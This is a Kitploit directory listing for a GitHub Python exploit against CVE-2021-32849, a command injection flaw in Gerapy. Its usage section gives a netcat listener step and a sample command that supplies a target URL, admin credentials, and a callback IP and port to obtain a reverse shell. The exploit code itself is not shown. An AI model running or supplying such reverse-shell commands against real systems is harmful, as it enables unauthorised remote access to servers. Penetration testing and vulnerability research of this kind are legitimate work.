Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2021-32849 — Python exploit for CVE-2021-32849, a command injection in Gerapy, enabling remote code execution with reverse shell. | Kitploit
Tools/GitHubGitHub/lowkey0808/cve-2021-32849
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHublowkey0808/cve-2021-32849

cve-2021-32849

Python exploit for CVE-2021-32849, a command injection in Gerapy, enabling remote code execution with reverse shell.

View Repository
24 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2021-32849

cve-2021-32849 (Gerapy command execution)

Usage

First start an nc listener, then use the exp to attack

root@kitploit:~
python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id

图片

Download Tool